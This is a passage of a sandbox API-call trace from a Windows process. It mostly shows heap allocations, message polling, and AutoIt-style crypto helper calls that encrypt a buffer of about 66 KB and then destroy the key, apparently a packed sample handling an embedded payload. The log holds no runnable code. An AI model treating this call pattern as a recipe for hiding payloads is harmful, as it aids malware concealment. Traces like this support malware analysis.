dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0187.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0187.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0187.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0187.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0187.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0187.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0187.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0187.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0187.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0187.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0187.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0187.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0187.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0187.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0187.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0187.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0187.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0187.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0187.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0187.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0187.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0187.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0187.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0187.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0187.458] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0187.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0187.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0187.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0187.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0187.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0187.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0187.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0187.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0187.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0187.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0187.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0187.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0187.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0187.459] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0187.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0187.459] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c27a8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27a8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0187.460] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.460] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.460] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.460] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.460] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.460] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0187.460] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.460] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.460] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0187.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df050 | out: hHeap=0x8a0000) returned 1 [0187.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0187.460] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.460] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0187.460] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0187.460] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0187.460] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.460] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0187.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0187.461] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.461] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0187.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0187.461] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.461] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.461] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.461] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0187.461] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.461] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0187.461] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.462] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.462] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x10526, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x10530) returned 1 [0187.462] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.462] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0187.462] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.462] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.462] CharLowerBuffW (in: lpsz="byte[66865]", cchLength=0xb | out: lpsz="byte[66865]") returned 0xb [0187.462] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.462] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.463] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.463] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.463] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.463] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa6f538*, pdwDataLen=0x87e820*=0x10526, dwBufLen=0x10530 | out: pbData=0xa6f538*, pdwDataLen=0x87e820*=0x10530) returned 1 [0187.464] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.464] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0187.464] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.464] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.464] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.464] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.464] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0187.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0f0 | out: hHeap=0x8a0000) returned 1 [0187.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.465] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.465] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0187.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.465] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.465] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0187.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0187.465] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.465] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.465] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0187.465] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0187.465] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0187.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0187.465] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.470] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.470] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0187.470] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.475] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.475] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.475] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0187.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.475] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0187.475] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.476] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0187.476] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.476] CryptDestroyKey (hKey=0x90af98) returned 1 [0187.476] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0187.476] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0187.476] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0187.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0187.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0187.476] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0187.476] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0187.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0187.476] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0187.477] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0187.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0187.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0187.477] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0187.477] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.477] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0187.477] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0187.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0187.477] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0187.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0187.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0187.477] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0187.477] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0187.477] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.477] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0187.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0187.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.477] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.477] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0187.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.478] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.478] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0187.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0187.478] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.478] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0187.478] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, 